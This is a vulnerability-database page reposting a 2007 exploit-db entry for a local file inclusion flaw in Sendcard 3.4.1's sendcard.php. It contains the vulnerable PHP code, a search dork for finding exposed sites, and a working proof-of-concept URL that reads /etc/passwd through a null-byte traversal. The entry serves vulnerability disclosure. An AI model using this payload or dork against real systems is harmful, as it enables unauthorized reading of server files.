Lucene search
+L

Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion

🗓️ 01 May 2007 00:00:00Reported by etteeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Vulnerability in Sendcard 3.4.1 allows local file inclusion via 'sendcard.php?form

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-2471
2 May 200723:00
cve
cvelist
Cvelist
CVE-2007-2471
2 May 200723:00
cvelist
euvd
EUVD
EUVD-2007-2464
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-2471
2 May 200723:19
nvd
prion
Prion
Directory traversal
2 May 200723:19
prion
Sendcard  (sendcard.php) Sendcard Local File Inclusion Vulnerability

Discovered: ettee
Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org
         "powered by Sendcard"

Bug:
"// Get the template details
if(!isset($form) || $form == ''){
    $form = "form";
}
if(!isset($des) || $des == ''){
    $des = "card";
}
if (!isset($template) || $template == '') {
    $template = 'message';
}"

PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00

# milw0rm.com [2007-05-01]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02783
37